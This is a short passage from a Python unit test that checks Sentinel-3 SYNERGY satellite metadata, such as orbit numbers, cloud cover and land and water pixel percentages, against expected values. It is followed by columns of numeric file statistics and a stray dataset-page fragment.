"absolute_orbit": 14616,
"relative_orbit": 99,
"cloud_cover": 0.280665,
"instrument": "SYNERGY",
"mode": "EO",
"productType": "SY_2_VGP___",
"snowOrIcePixels_percentage": 0.207021,
"salineWaterPixels_percentage": 86.89342,
"coastalPixelss_percentage": 0.048629,
"freshInlandWaterPixels_percentage": 0.355955,
"tidalRegionPixels_percentage": 0.062851,
"landPixels_percentage": 13.090312
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
| 36.124772
| 78
| 0.580645
| 5,437
| 59,353
| 6.067133
| 0.092146
| 0.112469
| 0.079061
| 0.081184
| 0.869585
| 0.846
| 0.835723
| 0.813957
| 0.806469
| 0.80077
| 0
| 0.066655
| 0.308679
| 59,353
| 1,642
| 79
| 36.146772
| 0.737278
| 0.031254
| 0
| 0.800607
| 0
| 0
| 0.292132
| 0.190154
| 0
| 0
| 0
| 0
| 0.024261
| 1
| 0.01213
| false
| 0
| 0.006823
| 0
| 0.019712
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.